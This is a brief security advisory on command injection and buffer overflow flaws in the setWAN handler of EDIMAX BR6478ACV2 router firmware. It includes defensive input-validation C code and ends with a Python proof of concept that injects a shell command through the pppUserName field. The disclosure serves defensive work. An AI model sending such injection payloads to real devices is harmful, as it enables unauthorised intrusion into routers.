Overview

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the setWAN function. The variables v7, v16 and v29 receive the pppUserName, pptpUserName and L2TPUserName parameters from a POST request. Because the user controls the contents of these variables, the system() statement that uses them can cause command injection.

The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the setWAN function. The variables v26, v27, v28, v39, v40, v41, v44 and v45 receive the pptpIPAddr, pptpIPMaskAddr, pptpDfGateway, L2TPIPAddr, L2TPMaskAddr, L2TPDefGateway, dns1 and dns2 parameters from a POST request. Because the user controls the contents of these variables, the system() statement can cause a buffer overflow.
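
One way to close both issues described above is to validate each parameter before it is formatted into a command or copied into a fixed-size buffer. The following is an added example, not code from the firmware or the vendor; the function names and the 64-byte user name limit are assumptions.

```c
/* Added example: hypothetical validators, not EDIMAX firmware code. */
#include <arpa/inet.h>
#include <stddef.h>

#define MAX_USERNAME_LEN 64   /* assumed limit; the page gives none */

/* Length of s, examining at most max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Allowlist for pppUserName / pptpUserName / L2TPUserName.
 * Only [A-Za-z0-9._@-] is accepted, so shell metacharacters
 * and whitespace never reach a command string. */
int is_safe_username(const char *s)
{
    size_t n;

    if (s == NULL)
        return 0;
    n = bounded_len(s, MAX_USERNAME_LEN + 1);
    if (n == 0 || n > MAX_USERNAME_LEN)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') ||
              c == '.' || c == '_' || c == '@' || c == '-'))
            return 0;
    }
    return 1;
}

/* Check for pptpIPAddr, pptpIPMaskAddr, dns1, dns2 and the other
 * address fields: reject over-long input first, then require a
 * strict dotted-quad, so nothing oversized is ever copied. */
int is_valid_ipv4(const char *s)
{
    struct in_addr addr;

    if (s == NULL || bounded_len(s, INET_ADDRSTRLEN) >= INET_ADDRSTRLEN)
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;
}
```

Passing validated values as separate argv entries to an exec-family call, instead of building a string for system(), removes the shell from the path entirely.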

POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {"wanMode": "2", "pppUserName": payload}
url = f'http://{ip}/goform/setWAN'

res = requests.post(url=url, data=data, verify=False)
print(res)